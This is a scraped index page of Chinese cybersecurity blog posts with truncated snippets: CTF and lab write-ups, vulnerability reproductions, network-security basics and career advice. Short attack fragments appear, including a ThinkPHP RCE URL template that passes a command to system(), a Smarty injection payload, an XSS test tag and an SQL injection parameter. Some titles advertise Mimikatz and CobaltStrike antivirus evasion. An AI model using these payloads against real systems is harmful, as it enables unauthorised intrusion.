#ansible #Certify 赛博雨天：https://yutianqaq.github.io/ Recon smb smbmap -H 10.10.11.222 -u 挂载 smb 到 kali mount -t cifs //10.10.11.222/Development ./smb -o usernamesmb 在 cat smb/Automation/Ansible/PWM/defaults/main.yml 得到 ansible 的加…

python爬虫之app爬取-mitmproxy 的使用

mitmproxy 的使用 mitmproxy 是一个支持 HTTP 和 HTTPS 的抓包程序，有类似 Fiddler、Charles 的功能，只不过它是一个控制台的形式操作。 mitmproxy 还有两个关联组件。一个是 mitmdump，它是 mitmproxy 的命令行接口，利用它我们可以对接 Python 脚本，用 Python 实现监听后…

全新攻击面管理平台

首页大屏内测阶段，免费试用一个月有兴趣体验的师傅，来长亭云图极速版群里找我 py

青少年CTF擂台挑战赛 2024 #Round 1 Web方向题解 WP 全

EasyMD5 题目描述：php没有难题考点总结：脑洞题目，不如我出（狗头只允许两个都上传pdf文件。文件还不能太大了。burp多次发包发现要求两个pdf内容不一样不一样时候，提示我们MD5碰撞。科学计数法绕过 PHP的后门 …

dvwa靶场xss通关

原理 XSS漏洞是攻击者将恶意代码注入到合法网页中，当用户浏览该页面时，恶意代码会被执行，从而获取用户敏感信息或进行其他攻击。形成原因网站对用户输入数据的过滤不严格或不完备，攻击者可以根据这个漏洞向网站提交恶意代码&am…

要坐牢的黑客技术，为什么还有人学？

让无数人牢底坐穿的黑客技术，为什么还有很多人前仆后继地想学习？ 黑客技术说白了就是网络攻击和防守技术，本身是没什么问题的。只是很多人学会技术之后喜欢剑走偏锋，比如说做外挂脚本盈利，比如说渗透进一些网站后台拿…

聊一聊常见的网络安全模型

目录一、概述二、基于时间的PDR模型 2.1 模型概念提出者 2.2 模型图 2.3 模型内容 2.3.1 Protection（保护） 2.3.2 Detection（检测） 2.3.3 Response（响应） 2.4 PDR模型思想 2.4.1 PDR模型假设 2…

服务器一直被暴力破解

通过journalctl -f 查看日志出现很多ssh连接的信息如下： pam_unix(sshd:auth): authentication failure; logname uid0 euid0 ttyssh ruser rhost183.213.26.65 userroot - pam_succeed_if(sshd:auth): requirement "uid > 1000" not met by user …

链路负载均衡之策略路由

一、策略路由的概念一般来说，防火墙是根据目的地址查看路由，这种情况下只能根据报文的目的地址为用户提供服务，没办法更加灵活对内网用户进行区分，让不同用户流量走不同的链路转发，如根据源地址、应用协议等区分流量…

浅谈社会工程学攻击

一、前言 1.1 社会工程学起源社会工程学是黑客米特尼克在《欺骗的艺术》中所提出，其初始目的是让全球的网民们能够懂得网络安全，提高警惕，防止没必要的个人损失。但在我国黑客集体中还在不断使用其手段欺骗无知网民制造违法行为，…

学习网络安全/黑客需要怎样的电脑配置？

学‮网习‬络安‮并全‬不需要特‮高别‬端的电脑配置，但‮需是‬要保证一定‮性的‬能和资源。以下是一些‮荐推‬的配置： **1、CPU：**建‮采议‬用Intel Core i5 或更高‮处的‬理器，AMD Ryzen 5 等‮可也‬以。 **2、内存&…

500强企业不会告诉你的真话，计算机专业如何更好地进大厂

“世界上所有的500强企业，都告诉你学历不重要，但他们绝对不会去一般学校招聘。” 听起来很残酷，可这就是事实。从一所普通的学校毕业，“混”了一个很普通的专业，最后只能入职一家低薪的小公司或者无法就业&#xff0c…

自学黑客，一般人我还是劝你算了吧

当我们谈论网络安全时，我们正在讨论的是保护我们的在线空间，这是我们所有人的共享责任。网络安全涉及保护我们的信息，防止被未经授权的人访问、披露、破坏或修改。一、网络安全的基本概念网络安全是一种保护：它涉及保护我们的设…

海翔ERP getylist_login.do接口存在sql注入漏洞

@[toc] 免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。 1. 海翔ERP 简介微信公众号搜索：南风漏洞复…

计算机服务器中了locked勒索病毒怎么解密，locked勒索病毒解密流程

科技的发展带动了企业生产，越来越多的企业开始利用计算机服务器办公，为企业的生产运营提供了极大便利，但随之而来的网络安全威胁也引起了众多企业的关注。近日，云天数据恢复中心接到许多企业的求助，企业的计算机服务器…

网络基础-企业网必不可少的NAT技术

知识改变命运，技术就是要分享，有问题随时联系，免费答疑，欢迎联系！ NAT是一种地址转换技术，它可以将IP数据报文头中的IP地址转换为另一个IP地址，并通过转换端口号达到地址重用的目的。NAT作为…

IPsec VPN之安全联盟

一、何为安全联盟 IPsec在两个端点建立安全通信，此时这两个端点被称为IPsec对等体。安全联盟，即SA，是指通信对等体之间对某些要素的约定，定义了两个对等体之间要用何种安全协议、IP报文的封装方式、加密和验证算法。SA是IPsec的基…

【PHP安全】PHP伪协议

PHP伪协议： file:// #访问本地文件系统http:// #访问HTTPs网址ftp:// #访问ftp URLphp:// #访问输入输出流zlib:// #压缩流data:// #数据（RFC 2397）ssh2:// #security shell2expect:// #处理交互式的流glob:// #查找匹配的文件路径phar:// #P…

【网络安全】SQL注入可导致RCE漏洞的一键利用工具

前言若依最新定时任务SQL注入可导致RCE漏洞的一键利用工具, 扫描和漏洞利用结束会自行删除所创建的定时任务。开门见山：（有对黑客技术，漏洞挖掘感兴趣的，可以看一下我整理的学习笔记和挖掘教程，相关工具包也有归类…

四.pandas数据处理

目录四.pandas数据处理 1.Pandas数据计算演示代码 1-sum（）求和 2-mean()求均值 3-std()求标准差 4-max()求最大值 5-median()中位数 2.reindex重置索引 1-重置行、列标签 2-重命名标签-rename（） 3-设置索引列 3.so…

内网 IP 地址泄漏原理以及修复方法

漏洞名称：内网IP地址泄漏漏洞描述： 网站的内部IP地址，常常被攻击者通过信息收集，得到其内网的IP地址，对于渗透攻击，打下良好基础，如内网Ip地址段，IP路由等等。IIS为常见的泄露内网…

以守为攻，零信任安全防护能力的新范式

引言在当今的数字化时代，网络安全已成为各个组织面临的一项重大挑战。随着技术的快速发展，攻击手段也在不断演变和升级，传统的安全防御策略已经无法完全应对新兴的安全威胁。在这种背景下，零信任安全（Zero Trust Secu…

哥斯拉流量webshell分析

哥斯拉流量webshell分析–>ASP流量分析（其他流量未实操） 哥斯拉是继菜刀、蚁剑、冰蝎之后的又一个webshell利器，这里就不过多介绍了。哥斯拉GitHub地址：https://github.com/BeichenDream/Godzilla 很多一线师傅不太了解其中的…

网络安全攻击数据的多维度可视化分析

简介本研究项目通过应用多种数据处理与可视化技术，对网络安全攻击事件数据集进行了深度分析。首先，利用Pandas库读取并预处理数据，包括检查缺失值、剔除冗余信息以及将时间戳转化为日期时间格式以利于后续时间序列分析。研究步骤数据分析…

案例--某站视频爬取

众所周知，某站的视频是： 由视频和音频分开的。所以我们进行获取，需要分别获得它的音频和视频数据，然后进行音视频合并。这么多年了，某站还是老样子，只要加个防盗链就能绕过。（防止403&#xf…

DDoS和CC攻击的原理

目前最常见的网络攻击方式就是CC攻击和DDoS攻击这两种，很多互联网企业服务器遭到攻击后接入我们德迅云安全高防时会问到，什么是CC攻击，什么又是DDoS攻击，这两个有什么区别的，其实清楚它们的攻击原理，也就知…

【靶机】vulnhub靶机clover:1

靶机下载地址： Clover: 1 ~ VulnHub 靶机ip：192.168.174.145 Kali ip：192.168.174.128 靶机ip发现：sudo arp-scan -l 靶机开放端口扫描分析： 发现开放了21端口ftp服务，且允许匿名登录 22端口ssh服务 8…

Pikachu 靶场搭建

文章目录环境说明1 Pikachu 简介2 Pikachu 安装环境说明操作系统：Windows 10PHPStudy 版本: 8.1.1.3Apache 版本：2.4.39MySQL 版本 5.7.26 1 Pikachu 简介 Pikachu是一个使用“PHP MySQL” 开发、包含常见的Web安全漏洞、适合Web渗透测试学习人员练…

APT攻击是什么？面对APT攻击，我们应该怎么做？

目录一、概念二、APT攻击特征三、APT攻击技术3.1 APT攻击方式3.2 APT攻击诱饵种类四、APT攻击模式4.1 第一阶段：扫描探测4.2 第二阶段：工具投送4.3 第三阶段：漏洞利用4.4 第四阶段：木马植入4.5 第五阶段：远程控制4.6 第…

[HNCTF 2022 WEEK2]e@sy_flower

获取基本信息获取关键字符串进来“开门红” 上一篇博客才发现这个按u转换为二进制有个无效db，最简单的花指令 nop掉重新u一下p一下就正常了然后编译完main函数 int __cdecl __noreturn main(int argc, const char **argv, const char **envp) {signed in…

数据库安全审计系统可以实现哪些价值？

2月12日晚，在即时通讯软件Telegram上，某机器人爆出超45亿国内个人信息遭到泄露，数据包括真实姓名、电话、地址等信息，并公开了免费查询渠道。该机器人管理员提供的navicat截图显示，数据量为4541420022条(45亿)&#xf…

CTF BugKu平台—(MISC篇①）

签到题扫码直接得flag 社工—进阶收集： 既然是社工那肯定不是使用工具去看图片 ，换个思路百度识图找一下大概是在哪是 — “西安的大雁塔” 在根据聊天记录的线索去西安地铁路线找到大雁塔而且转一战是在小塞往前走七站就是起始站韦曲南&…

蓝奏云网盘下载链接无法打开的解决方法（详解全）

🎈前言蓝奏云是一家国内的比较有良心的网盘提供商，提供有不限量的网盘空间，且不限制下载速度，免费用户只限制上传单文件小于100M的文件。算是比较有良心的。而且下载还不用登录才能下载（很多标称免费的网盘均需要下载者…

如何30天零基础入门网络安全？自学网络安全有哪些缺点？

网络安全的前景如何，盾叔已经说过很多遍了，今天专题是替一些想入门网络安全，但还迷茫不知所措的同学解一解惑。想30天零基础入门网络安全，这些你一定要搞清楚。一、学习网络安全容易造成的误区 1、把编程当作目的，忽…

【vulhub漏洞复现】redis 4-unacc 未授权访问漏洞

一、漏洞详情影响版本 Redis 2.x，3.x，4.x，5.xRedis默认情况下，会绑定在0.0.0.0:6379(在redis3.2之后，redis增加了protected-mode，在这个模式下，非绑定IP或者没有配置密码访问时都会报错)&#x…

中国信通院权威认可！腾讯云机密计算平台应用入选“星熠”案例

近日，由中国信息通信研究院安全研究所主办的首届“数据安全共同体计划成员大会”在京召开，会上正式公布2022年数据安全“星熠”案例评选结果。腾讯云申报的《企业HR机密信息的大数据隐私计算应用案例》项目，成功入选“隐私计算技术应用优秀案…

怎样让域名避免遭受黑客攻击？

我们的网站和域名经常会因为没有得到充分的保护而被黑客攻击，这将是一个快速而简单的过程。通常情况下，我们域名所有人是不会经常去检查我们的网站的，直到网站被入侵可能几个月才发现。在域名遭到黑客入侵的情况下，所有者通常可以…

DC:2靶机通关详解

信息收集开放80端口访问看看发现访问不了,回去看了一眼介绍要手动改一下hosts 现在可以正常访问了直接拿到flag1 在网站最后发现是wordpress的站点 wpscan开扫版本4.7.10 存在很多漏洞再扫个路径看看这里能到后台结合flag1所说的,常规字典不好使了,可能需要cewl…

ATTCK v13版本战术介绍——凭证访问（二）

一、引言在前几期文章中我们介绍了ATT&CK中侦察、资源开发、初始访问、执行、持久化、提权、防御规避战术，本期我们为大家介绍ATT&CK 14项战术中凭证访问战术第7-12种子技术，后续会介绍凭证访问其他子技术，敬请关注。二、ATT&…

自学网络安全（白帽黑客）必看！OWASP十大漏洞解析！

在学习网络安全之前，需要总体了解安全趋势和常见的Web漏洞，在这里我首推了解OWASP，因为它代表着业内Web安全漏洞的趋势； 目录一、OWASP简介 OWASP Top 10: 2013版至2017版改变了哪些内容二、OWASP Top 10 A1:注入漏洞 A2:…

2023百城巡展杭州站：强合作、深扎根，“浙”里共赢数安蓝海

灵秀杭州，数字经济之城十年来，以不凡实力筑就了繁荣的数字经济成为中国数据要素最为集中的城市之一 6月9日，“新起点新战略共赢数安蓝海”，2023美创科技百城巡展来到了“大本营”——杭州。邀老友，迎新友&…

腾讯安全董志强：四大关键步骤促进数据安全治理闭环，提升企业免疫力

高速发展的数字时代，数据已成为推动产业发展的最重要生产要素之一，真正成为了创造经济财富的数字能源，守护数据资产的安全成为企业高质量发展不可回避的重要命题。 6月13日，腾讯安全联合IDC发布“数字安全免疫力”模型框架&#…

【详细分析】thinkphp反序列化漏洞

文章目录配置xdebug反序列化漏洞利用链详细分析poc1（任意文件删除）测试pocpoc2（任意命令执行）poc3（任意命令执行） 补充代码基础函数trait关键字应用案例优先级多trait 配置xdebug php.ini [Xdebug] zend…

曲路密码算法

曲路密码参考一日一加密——曲路密码文章目录曲路密码用一个例子来说明加密方式假设要加密的文本text123456789ABCDEFGHI,长度为18 那么可以用一个3*6的矩阵也可以用一个2*9的矩阵恰好填入18个字符这里选用3*6的矩阵,即3行\times每行6列的矩阵首先将text按行填入该矩阵,如…

Telnet实验、AAA认证实验、配置文件备份和还原实验

Telnet实验拓扑需求 R1远程R2 配置步骤 1）配置接口的IP地址 2）在R2设备配置telnet远程 3）使用R1远程R2 配置命令第一步：配置R1的IP地址 <Huawei>un t m //关闭消息 <Huawei>sys //进入系统视图 [Huaw…

网络通信安全部分笔记——静态路由及实验

EVE的具体使用添加新的图名字自己随便取一个 close lab关掉图文件管理中可以找到我们刚刚创建的图，点开它可以对我们创建的图进行打开编辑删除打开图之后空空白白，怎么添加设备呢？直接右键找到Node。有一大堆设备任你选择，我…

SQL注入—Access注入，Access偏移注入

Access注入，Access偏移注入 Access数据库组成表名列名数据某accessasp注入靶场 iisaspaccess asp一般搭配access PHP一般搭配mysql aspx一般搭配msSQL注入的条件是能够传参、与数据库互动，数据交互 get，post，cookie都可以注入…

渗透测试信息收集概要

文章目录信息收集概要Whois查询指纹CMS网站IP旁站、C段服务器服务器操作系统版本、容器版本、数据库类型邮箱收集端口服务（80、443等）敏感文件搜索目录遍历说明.txt目录遍历说明.txt信息收集概要 Whois查询联系人信息邮箱反查域名指纹CMS 人工、工…

渗透测试信息收集——CDN绕过

文章目录绕CDN查找真实IP1、如何判断目标存在 CDN 服务？2、网站真实IP2.1、不同IP访问查询2.2、利用子域名请求获取真实IP2.3、第三方网站查验2.4、利用国外地址请求获取真实IP2.5、利用邮件服务器接口获取真实IP2.6、敏感文件2.7、利用黑暗引擎获取真实IP2.8、dns…

【DNS】DNS部署与安全

文章目录DNS部署与安全一、DNS二、域名组成1、域名组成概述2、域名组成三、监听端口四、DNS解析种类1、按照查询方式分类2、按照查询内容分类五、DNS服务器搭建过程1、安装DNS组件2、打开DNS服务3、正向查询3.1、新建正向区域3.2、新建主机（A记录）3.3、验…

【CIFS】文件共享服务器

文章目录文件共享服务器（cifs）一、共享服务器概述二、创建共享三、访问共享四、创建隐藏的共享五、共享命令六、屏蔽系统隐藏共享自动产生1、通过命令取消隐藏文件夹共享2、打开注册表3、定位共享注册表位置七、关闭445端口（文件共享&#xf…

xctf misc基础题

斑马斑马打开后可以发现是条形码的样子网站：https://online-barcode-reader.inliteresearch.com/ 可以获得flag flag{TENSHINE} 低的 https://adworld.xctf.org.cn/media/file/task/15a04eedcabe43978bb692c21a0f1b52.rar 通过stegsolve进行查看，自…

HDCTF web复现

[HDCTF 2023]SearchMaster 传data 使用{if}标签闭合达到命令执行的效果 {if phpinfo()}{/if} NSSCTF{f578f8ba-246e-452b-b070-22bc4fc4313d} Smarty模板注入&CVE-2017-1000480 - 先知社区 (aliyun.com) [HDCTF 2023]YamiYami 非预期解第一个连接跳转到百度&#xf…

家里小孩要去学网络安全，网络安全行业前景到底怎么样？

最近接待了很多学生家长来咨询网络安全学习的问题。家长们最主要关注三点：什么是网络安全？网络安全行业前景好吗？工资能拿多少？哪些专业什么学历可以学习网络安全？ 那么盾叔就来综合解答一下。什么是网络安全&…

安全渗透工程师入门最快需要多久？提供具体路线和学习框架

前言网络渗透这个东西学起来如果没有头绪和路线的话，是非常烧脑的。最快达到入门也要半年理清网络渗透学习思路，把自己的学习方案和需要学习的点全部整理，你会发现突然渗透思路就有点眉目了。网络安全好混，但不容易混得好。…

SystemFunction032函数的免杀研究

什么是SystemFunction032函数？ 虽然Benjamin Delphi在2013年就已经在Mimikatz中使用了它，但由于我之前对它的研究并不多，才有了下文。这个函数能够通过RC4加密方式对内存区域进行加密/解密。例如，ReactOS项目的代码中显示&…

XCTF 攻防世界 Reverse新手题（getit）

XCTF 攻防世界 Reverse新手题（getit） 首先，判断文件有没有加壳，是多少位的，利用exeinfoPE可以得知，程序并没有加壳，并且是64位的elf程序直接用IDA64打开，找到main函数，…

vulnhub靶场渗透之SickOs1.2渗透教程（超级详细）

vulnhub靶场渗透之SickOs1.2渗透教程目录 0x01靶机概述 0x02靶场环境搭建 0x03靶机信息发现 0x04渗透靶机使用第二种方法：msfvenom生成载荷模块curl上传至服务器触发 0x05本地提权方法一：将当前用户（www-data）加入sudo组提…

皮卡丘XXE/URL重定向/SSRF

一.XXE 1.概述 XXE -"xml external entity injection" 既"xml外部实体注入漏洞"。概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题" 也就是说服务端接收和解析了来自用户端的xml数据,而又…

喜报！Coremail网关再获肯定—爱分析·信创产品及服务创新奖

2023年3月21日，爱分析ifenxi正式公布“2023爱分析信创产品及服务创新奖”评选活动结果，活动面向党政、金融、石油、电力、电信、交通、航空航天、医疗和教育等领域的相关企业及机构，围绕信创实践案例、信创付费客户数量、信创产品收入三个维度…

SQL注入

HVV笔记——SQL注入1 靶场和环境的安装1.1 php环境1.2 pikachu靶场1.2.1 下载地址1.2.2 部署2 SQL注入原理3 如何判断注入点3.1 SQL注入可能存在的地方3.1.1 登录框3.1.2 查询3.1.3 订单处理3.1.4 获取http头功能点4 SQL注入常见类型4.1 union联合查询4.1.1 数字型4.1.2 字符型…

记一次weblogic反序列化到内网域控上线

声明：文中涉及到的技术和工具，仅供学习使用，禁止从事任何非法活动，如因此造成的直接或间接损失，均由使用者自行承担责任。点点关注不迷路，每周不定时持续分享各种干货。众亦信安，中意你啊&am…

ToBeWritten之Car ATTCK 矩阵

也许每个人出生的时候都以为这世界都是为他一个人而存在的，当他发现自己错的时候，他便开始长大少走了弯路，也就错过了风景，无论如何，感谢经历转移发布平台通知：将不再在CSDN博客发布新文章，敬…

再摘一枚重要奖项！腾讯安全获得云安全联盟CSA 2022安全金盾奖

4月13日，第六届云安全联盟大中华区大会（CSA GCR Congress）在上海举办，大会由联合国数字安全联盟、上海市经济和信息化委员会、上海市委网络安全和信息化委员会办公室、上海市普陀区人民政府指导，云安全联盟大中华区主办…

可鉴别加密工作模式-同时保护数据机密性和完整性（OCB、CCM、KeyWrap、EAX和GCM）第二部分

当算法用于同时保护数据的机密性和完整性时，应选取合适的可鉴别加密工作模式，例如OCB、CCM、KeyWrap、EAX和GCM等工作模式。以下总结来自GBT36624-2018国标文本（修改采用ISO/IEC 19772-2009）。对于加密工作模式上篇（可…

Vulnhub项目：Lin.Security（Linux提权大合集）

靶机地址：linsecurity靶机描述了用户名和密码用户名：bob、密码：secret登录后看到了IP地址，或者在kali上像之前那样进行ip收集，端口收集开放的端口有很多，从22端口开始，知道用户名和密码&#xf…

反序列化渗透与攻防(三)之Apache Commons Collections反序列化漏洞

Java Apache Commons Collections反序列化漏洞项目地址：Collections – Download Apache Commons Collections 本地复现环境： jdk 1.7.0_80IDEA Project Structrure——>Projrct设置成1.7IDEA Project Structrure——>Moudles设置成1.7Settings——>Build,Execut…

了解Session的本质

有一点我们必须承认，大多数web应用程序都离不开session的使用。这篇文章将会结合php以及http协议来分析如何建立一个安全的会话管理机制。 AD： 有一点我们必须承认，大多数web应用程序都离不开session的使用。这篇文章将会结合php以及http协…

网络安全从业人员2023年后真的会被AI取代吗？

随着ChatGPT的火爆，很多人开始担心网络安全从业人员会被AI取代。如果说网络安全挖洞的话，AI可能真的能取代。但是网络安全不仅仅只是挖洞，所以AI只是能缓解网络安全人员不足的情况，但是是不会取代人类的作用的。就拿最近很火的C…

企业关键数据资产如何保护？腾讯安全联合“数据安全推进计划”落地主题沙龙

4月26日，腾讯安全联合中国信通院“数据安全推进计划”共同在深圳举办了数据安全研讨会，共同探讨新形势下如何让企业关键数据资产更安全。中国信息通信研究院云计算与大数据研究所高级业务主管龚诗然、腾讯云安全总经理李滨、炼石网络创始人兼CEO白小勇、…

IPsec中IKE与ISAKMP过程分析（主模式-消息3）

IPsec中IKE与ISAKMP过程分析（主模式-消息1）_搞搞搞高傲的博客-CSDN博客 IPsec中IKE与ISAKMP过程分析（主模式-消息2）_搞搞搞高傲的博客-CSDN博客阶段目标过程消息IKE第一阶段建立一个ISAKMP SA实现通信双发的身份鉴别和密钥交换&…

《网络安全0-100》安全策略制定

安全策略制定安全策略制定是指制定一系列的规范、标准和流程，以保护企业或组织的信息资源和业务活动，确保其安全性和可靠性。安全策略制定通常包括以下几个步骤： 风险评估：对企业或组织的信息系统进行全面评估&#xff…

网络安全行业优势与劣势：是否值得入行？

前言我在大学期间接触到了计算机技术，并且对网络安全产生了浓厚的兴趣，因此开始自学相关技能和知识，参加各种CTF比赛，并且参与学校网络安全实验室的项目。毕业后，我有幸加入了一家网络安全公司，开始了我的…

【网络安全-流安全技术】1、“流安全”技术思路的由来

介绍“流安全”技术思路的由来 ---Jack zhai 标签：网络安全流安全虚拟化信息安全一、回顾信息安全防御思路的历程信息安全起源于战争中的通信加密技术，分为信息的存储安全与传输安全。存储安全就是保存在“城堡”中时，对方既不能明着…

零基础学网络安全

学前感言: 1.这是一条坚持的道路,三分钟的热情可以放弃往下看了.2.多练多想,不要离开了教程什么都不会了.最好看完教程自己独立完成技术方面的开发.3.有时多 google,baidu,我们往往都遇不到好心的大神,谁会无聊天天给你做解答.4.遇到实在搞不懂的,可以先放放,以后再来解决. 一…

CTF入门指南

何为CTF ？ CTF（Capture The Flag）夺旗比赛，在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球黑客大会，以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。…

文件包含漏洞学习小结

目录一、介绍二、常见文件包含函数三、文件包含漏洞代码举例分析四、文件包含漏洞利用方式 4.1 本地文件包含 1、读取敏感文件 2、文件包含可运行的php代码 ①包含图片码 ②包含日志文件 ③包含环境变量getshell ④临时文件包含 ⑤伪协议 4.2 远程文件包含 4.…

网络隐身学习概述

网络隐身分类一、 IP地址欺骗（一）IP地址欺骗详释（二）TCP/IP协议释义1、TCP/IP的层次结构：2、TCP/IP的重要协议：（三）IP攻击中如何建立信任关系：（四&#xff09…

耗时 48小时整理了网络安全学习路线，非常详细！

前言上次发的文章【都2023年了，还在问网络安全怎么入门】很多小伙伴在评论区回复不知道怎么学习，我也反思了一下，确实没写到学习方法和路线，所以这一期就出一一个怎么学习网络安全的学习路线和方法，觉得有用的话三连…

用友时空KSOA SQL注入漏洞[2023-HW]

用友时空KSOA SQL注入漏洞一、产品简介二、漏洞分析三、影响范围四、复现环境五、漏洞复现小龙POC检测脚本:批量SQL注入源码六、修复建议**临时缓解方案**升级修复方案免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供…

VScode安装教程和中文设置

软件：Visual Studio Code 版本：2023 语言：简体中文大小：88.48M 安装环境：Win11/Win10 硬件要求：CPU2.0GHz 内存4G(或更高） 下载链接： https://pan.baidu.com/s/1jpMsGkoXZ0MHFcCWH_…

网络安全（黑客）自学笔记建议

前言 1.不要试图以编程为基础的学习开始学习我在之前的回答中，我都一再强调不要以编程为基础再开始学习网络安全，一般来说，学习编程不但学习周期长，而且实际向安全过渡后可用到的关键知识并不多一般人如果想要把编程学好再开…

内网渗透神器CobaltStrike之权限提升(七)

Uac绕过常见uac攻击模块 UAC-DLL UAC-DLL攻击模块允许攻击者从低权限的本地管理员账户获得更高的权限。这种攻击利用UAC的漏洞，将ArtifactKit生成的恶意DLL复制到需要特权的位置。适用于Windows7和Windows8及更高版本的未修补版本 Uac-token-duplication 此攻…

亿赛通电子文档安全管理系统 RCE漏洞复现(QVD-2023-19262)

0x01 产品简介亿赛通电子文档安全管理系统（简称：CDG）是一款电子文档安全加密软件，该系统利用驱动层透明加密技术，通过对电子文档的加密保护，防止内部员工泄密和外部人员非法窃取企业核心重要数据资产&…

Mimikatz免杀实战:绕过360核晶和defender

文章目录前言绕过360核晶实现思路完整代码运行测试绕过WD实现思路MiniDumpWriteDump回调函数加密dump文件完整代码运行测试参考文章前言通常来说，即使我们成功实现了mimikatz的静态免杀，其抓取hash的行为仍可能会被防病毒软件检测到虽然你可以通过…

Pikachu靶场——XSS漏洞(Cross-Site Scripting)

文章目录 1. XSS（Cross-Site Scripting）1.1 反射型XSS(get)1.2 反射型XSS(post)1.3 存储型XSS1.4 DOM型XSS1.5 DOM型XSS-X1.6 XSS盲打1.7 XSS之过滤1.8 XSS之htmlspecialcharss1.9 XSS之href输出1.10 XSS之JS输出1.11 XSS 漏洞防御 1. XSS（Cr…

攻防世界-ext3

原题解题思路下载下来的文件解压就可以看到非常多的文件夹，直接搜索flag 明显用base64加密了：解码工具

0.1 Kali Linux渗透测试系列教程前言，资料下载以及免责声明

最新文章都在专栏中，免费订阅，持续更新！（给个免费的关注呗，真不行就点个赞吧，你们的支持真的对我很重要） 前言有很多人希望学习网络安全或是黑客技术，我将带领大家学习知名渗透测…

xsschallenge通关（1-10）

文章目录 level1level 2level 3level 4level 5level 6level 7level 8level9level 10 level1 这一关很简单，标准的xss注入，打开hackbar，输入 <script>alert(/xss/)</script>点击EXECUTE，通关！ level 2 这…

【杂谈分享】关于我去HVV当猴子这件事——HVV日记

目录前言序幕开局入世破妄终章前言今年第一次参加HVV行动。去当蓝队专家（cai niao）。大概是六月末，领导说今年的HVV派我去参加。毕竟是第一次参加，因此虽然可能就没办法放假了，而且也没有额外工资&…

攻防世界-Web_php_unserialize

原题解题思路注释说了flag存在f14g.php中，但是在wakeup函数中，会把传入的文件名变成index.php。看wp知道，如果被反序列话的字符串其中对应的对象的属性个数发生变化时，会导致反序列化失败而同时使得__wakeup 失效（CV…

权限提升-手工-系统权限提升

权限提升基础信息 1、具体有哪些权限需要我们了解掌握的？ 后台权限，网站权限，数据库权限，接口权限，系统权限，域控权限等 2、以上常见权限获取方法简要归类说明？ 后台权限：SQL注入,数…

PbootCMS 3.0.4 SQL注入

1.漏洞复现 PbootCMS 3.0.4，下载仓库星梦/PbootCMS - Gitee.com 复现漏洞页面：http://127.0.0.1/?search 或 http://127.0.0.1/?keyword POST请求：1select 1 2.正向分析从可见功能点正向分析 index.php ... // 引用内核启动文件…

网络安全—0基础学习笔记（黑客）

一、前言 1.这是一条坚持的道路,三分钟的热情可以放弃往下看了. 2.多练多想,不要离开了教程什么都不会了.最好看完教程自己独立完成技术方面的开发. 3.有时多 google,baidu,我们往往都遇不到好心的大神,谁会无聊天天给你做解答. 4.遇到实在搞不懂的,可以先放放,以后再来解决. …

权限提升-Windows本地提权-AT+SC+PS命令-进程迁移-令牌窃取-getsystem+UAC

权限提升基础信息 1、具体有哪些权限需要我们了解掌握的？ 后台权限，网站权限，数据库权限，接口权限，系统权限，域控权限等 2、以上常见权限获取方法简要归类说明？ 后台权限：SQL注入,数…

2023年信息安全管理与评估（赛项）评分标准第三阶段夺旗挑战CTF（网络安全渗透）

全国职业院校技能大赛高职组信息安全管理与评估 （赛项） 评分标准第三阶段夺旗挑战CTF（网络安全渗透） 竞赛项目赛题本文件为信息安全管理与评估项目竞赛-第三阶段赛题，内容包括：夺旗挑战CTF&#xff08…

weblogic/CVE-2018-2894文件上传漏洞复现

启动docker环境查看帮助文档环境启动后，访问http://your-ip:7001/console，即可看到后台登录页面。执行docker-compose logs | grep password可查看管理员密码，管理员用户名为weblogic，密码为lFVAJ89F 登录后台页面，…

攻防世界-php_rce

原题解题思路 thinkPHP.0有漏洞，ThinkPHP5.x rec 漏洞分析与复现。本题就是利用漏洞查找。格式是： ?sindex/\think\app/invokefunction&functioncall_user_func_array&vars[0]system&vars[1][]命令。 ls查看文件没什么东西，r…

CVE-2023-23752：Joomla未授权访问漏洞复现

CVE-2023-23752：Joomla未授权访问漏洞复现前言本次测试仅供学习使用，如若非法他用，与本文作者无关，需自行负责！！！ 一.Openfire简介 Joomla是一个免费的开源内容管理系统（CMS&a…

服务端请求伪造(SSRF)

文章目录渗透测试漏洞原理服务端请求伪造1. SSRF 概述1.1 SSRF 场景1.1.1 PHP 实现 1.2 SSRF 原理1.3 SSRF 危害 2. SSRF 攻防2.1 SSRF 利用2.1.1 文件访问2.1.2 端口扫描2.1.3 读取本地文件2.1.4 内网应用指纹识别2.1.5 攻击内网Web应用 2.2 SSRF 经典案例2.2.1 访问页面2.2.…

SQL注入 - 宽字节注入

文章目录 SQL注入 - 宽字节注入宽字节注入前置知识宽字节靶场实战判断是否存在SQL注入判断位数判显错位判库名判表名判列名 SQL注入 - 宽字节注入靶场 sqli - labs less-32 宽字节注入主要是绕过魔术引号的，数据库解析中除了UTF-8编码外的所有编码如：G…

等级保护 —— 安全控制点，安全要求

等级保护 —— 安全控制点，安全要求安全物理环境： 物理位置选择 a）机房场地应选择在具有防震、防风和防雨等能力的建筑内； 1）核查是否有建筑物抗震设防审批文档。2）核查是否有雨水渗漏的痕迹。3&#…

ctfshow 反序列化

PHP反序列化前置知识序列化和反序列化对象是不能在字节流中传输的，序列化就是把对象转化为字符串以便存储和传输，反序列化就是将字符串转化为对象魔术方法 __construct() //构造，当对象new时调用 __wakeup() //执行unserialize()时&am…

upload-labs1-21关文件上传通关手册

upload-labs文件上传漏洞靶场目录 upload-labs文件上传漏洞靶场第一关pass-01：第二关Pass-02第三关pass-03：第四关pass-04：第五关pass-05：第六关pass-06：第七关Pass-07第八关Pass-08第九关Pass-09第十关Pass-10第十一…

业务安全及实战案例

业务安全关于漏洞： 注入业务逻辑信息泄露 A04:2021 – Insecure Design 在线靶场PortSwigger 1. 概述 1.1 业务安全现状 1.1.1 业务逻辑漏洞近年来，随着信息化技术的迅速发展和全球一体化进程的不断加快，计算机和网络已经成为与…

网络安全设备概念的熟悉和学习

什么是网络安全？网络安全技术有哪些？ Web应用防火墙（WAF）为什么需要WAF？什么是WAF？与传统防火墙的区别WAF不是全能的入侵检测系统（IDS）什么是IDS？跟防火墙的比较部署位置…

最小年龄仅5岁！盘点全球最“天才”少年黑客 TOP 10

